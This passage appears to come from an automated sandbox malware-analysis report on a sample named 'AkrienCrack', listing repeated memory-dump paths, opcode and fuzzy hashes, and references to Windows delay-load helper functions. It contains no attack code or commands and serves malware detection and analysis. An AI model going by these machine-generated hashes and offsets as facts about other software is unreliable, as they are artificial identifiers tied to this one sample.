              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 992f518a5d72cc98d539f2098485e2376312ad14f1578a6ab19821467d2fbe46
              • Instruction ID: 5d6a9e32f1bbda4d4c809aedcc901263c7df4bddfd664ad2b6c4e4295631ff69
              • Opcode Fuzzy Hash: 992f518a5d72cc98d539f2098485e2376312ad14f1578a6ab19821467d2fbe46
              • Instruction Fuzzy Hash: 38B0129736C103ED312C53082C07F3702ECC0C0B12331C6DABC0DC1250D9404C0C4931
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5DBD5
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 968c1ae3c6d869675db7b2e1a8d0591daaa044d5994a6179cd82fcc8c8e82452
              • Instruction ID: 18d38f8750b667fd99ca4c5417ce8ff54547ee85f3fcd77931eab102e408d46b
              • Opcode Fuzzy Hash: 968c1ae3c6d869675db7b2e1a8d0591daaa044d5994a6179cd82fcc8c8e82452
              • Instruction Fuzzy Hash: 60B0129636C102AD312C52582C07F3A02DDD0C0B1233086EAB81EC0650D9404C0C4931
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5DBD5
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 35f2911c69f61bca1ac3598c4b2fbd29730d56229f614b0807e8121e3a6cd71d
              • Instruction ID: 1f8d0e2f25561b0440be366ef1b4e2f5de7a82362149cd4a66d1d3682a3c93e5
              • Opcode Fuzzy Hash: 35f2911c69f61bca1ac3598c4b2fbd29730d56229f614b0807e8121e3a6cd71d
              • Instruction Fuzzy Hash: D2B0129637C207BD322C13042C07F3702DCC0C0B1233087EAB809D015099404C4C4831
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5DAB2
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 08db1c17cae1705203b300fd9255f9c4611914b5d1742f0f0dbb17fd24219858
              • Instruction ID: ac43904c93fc54c26e2b31d7f4a1951ce8806853c22a31ad08b7a931c08b84c8
              • Opcode Fuzzy Hash: 08db1c17cae1705203b300fd9255f9c4611914b5d1742f0f0dbb17fd24219858
              • Instruction Fuzzy Hash: F2B012922AC201AD7138B3196D46F3B02CCD0C0B1233083EBB80DC0048D4804C0C4D31
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5DC36
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 05b172946e13f83981d82243fabaf6f27d81aa5eccc941409feb957f85e11c5f
              • Instruction ID: 096aff653ea4e997230cbc45874073a8651fc8b0586ac0aab683642ab4488b51
              • Opcode Fuzzy Hash: 05b172946e13f83981d82243fabaf6f27d81aa5eccc941409feb957f85e11c5f
              • Instruction Fuzzy Hash: 04B0129666C301BD311C2208EE02F3602ECC1C1B123308BDEBA0AF0050D5805C4C5C31
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5DC36
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: fabb6ea1402eada790013fb38c8e9e8a9f7a4387f824d2d8efe113e99c41d6de
              • Instruction ID: b28bbc35b53573e60cab65c29922c7173338f3f2c73a548fb827ffba097de6c6
              • Opcode Fuzzy Hash: fabb6ea1402eada790013fb38c8e9e8a9f7a4387f824d2d8efe113e99c41d6de
              • Instruction Fuzzy Hash: 0BB0129666C201AD311C620CEC02F3602ECC0C6B12330CBDEBE0EE0150D5805C0D4D31
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5DC36
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 0a17a3bf4bc8e79ade33b0d7d44eb9cd522af398c399a9f772f0f83d3943e34d
              • Instruction ID: c4feff195bbbd6d36e4196722866cba0736d64a404f6656aef6ea5c6ae558e77
              • Opcode Fuzzy Hash: 0a17a3bf4bc8e79ade33b0d7d44eb9cd522af398c399a9f772f0f83d3943e34d
              • Instruction Fuzzy Hash: A4B0129667C301AD311C620CEC02F3602ECC0C1B123308BDFBA0EE0150D5805C0C4D31
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5D8A3
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 5ba266fc285d57971c3b20f7b829cf3058dada659e99cca2b4a9569e4dc2c753
              • Instruction ID: 829117a70eaf93670f7fca149764e4fd72e51366f6f1a7ee31b9e2575dd8e768
              • Opcode Fuzzy Hash: 5ba266fc285d57971c3b20f7b829cf3058dada659e99cca2b4a9569e4dc2c753
              • Instruction Fuzzy Hash: 0CA0029556D502BD712862516D56F36029DC4C5B5333486D9B85A940D19540584D5C31
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5D8A3
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 72059ff9b90402bf731c87e032c43abd30f50f30658c8beca2d78ad9b427dd09
              • Instruction ID: 829117a70eaf93670f7fca149764e4fd72e51366f6f1a7ee31b9e2575dd8e768
              • Opcode Fuzzy Hash: 72059ff9b90402bf731c87e032c43abd30f50f30658c8beca2d78ad9b427dd09
              • Instruction Fuzzy Hash: 0CA0029556D502BD712862516D56F36029DC4C5B5333486D9B85A940D19540584D5C31
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5D8A3
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: c33a5fd7e8774e5cc96c89d9f81d87ddefa699e33e5e7065b6a5949fa45fe64d
              • Instruction ID: 829117a70eaf93670f7fca149764e4fd72e51366f6f1a7ee31b9e2575dd8e768
              • Opcode Fuzzy Hash: c33a5fd7e8774e5cc96c89d9f81d87ddefa699e33e5e7065b6a5949fa45fe64d
              • Instruction Fuzzy Hash: 0CA0029556D502BD712862516D56F36029DC4C5B5333486D9B85A940D19540584D5C31
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5D8A3
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: c382bd7054d32081384a81ccdb88ba30c122a6a9337e6d78f375c2234d37d108
              • Instruction ID: 829117a70eaf93670f7fca149764e4fd72e51366f6f1a7ee31b9e2575dd8e768
              • Opcode Fuzzy Hash: c382bd7054d32081384a81ccdb88ba30c122a6a9337e6d78f375c2234d37d108
              • Instruction Fuzzy Hash: 0CA0029556D502BD712862516D56F36029DC4C5B5333486D9B85A940D19540584D5C31
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5D8A3
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 20b32e31e04a73ce3c4f6126b4b69a2bbea0541102f625b4d3bcfbbd40272629
              • Instruction ID: 829117a70eaf93670f7fca149764e4fd72e51366f6f1a7ee31b9e2575dd8e768
              • Opcode Fuzzy Hash: 20b32e31e04a73ce3c4f6126b4b69a2bbea0541102f625b4d3bcfbbd40272629
              • Instruction Fuzzy Hash: 0CA0029556D502BD712862516D56F36029DC4C5B5333486D9B85A940D19540584D5C31
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5D8A3
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 056f1be5a5339bba5210a3605c93909922298c029fb80c787bbd51d3d5551ac0
              • Instruction ID: 829117a70eaf93670f7fca149764e4fd72e51366f6f1a7ee31b9e2575dd8e768
              • Opcode Fuzzy Hash: 056f1be5a5339bba5210a3605c93909922298c029fb80c787bbd51d3d5551ac0
              • Instruction Fuzzy Hash: 0CA0029556D502BD712862516D56F36029DC4C5B5333486D9B85A940D19540584D5C31
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5D8A3
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 1ae8e425f1724b2d03e1818657c08ae96d5bd602ab95b2ef487f03961a55cbe5
              • Instruction ID: 829117a70eaf93670f7fca149764e4fd72e51366f6f1a7ee31b9e2575dd8e768
              • Opcode Fuzzy Hash: 1ae8e425f1724b2d03e1818657c08ae96d5bd602ab95b2ef487f03961a55cbe5
              • Instruction Fuzzy Hash: 0CA0029556D502BD712862516D56F36029DC4C5B5333486D9B85A940D19540584D5C31
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5D8A3
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 70b250536d035e7feb7a53fbe3ae7d0e9dddc13410bc47fbb7b8082e37f06cc0
              • Instruction ID: 829117a70eaf93670f7fca149764e4fd72e51366f6f1a7ee31b9e2575dd8e768
              • Opcode Fuzzy Hash: 70b250536d035e7feb7a53fbe3ae7d0e9dddc13410bc47fbb7b8082e37f06cc0
              • Instruction Fuzzy Hash: 0CA0029556D502BD712862516D56F36029DC4C5B5333486D9B85A940D19540584D5C31
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5D8A3
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: fa97aac5ac398a994d01f7632cadb528ddabe1009339fc4daae5fac7dec916c1
              • Instruction ID: 829117a70eaf93670f7fca149764e4fd72e51366f6f1a7ee31b9e2575dd8e768
              • Opcode Fuzzy Hash: fa97aac5ac398a994d01f7632cadb528ddabe1009339fc4daae5fac7dec916c1
              • Instruction Fuzzy Hash: 0CA0029556D502BD712862516D56F36029DC4C5B5333486D9B85A940D19540584D5C31
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5D8A3
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
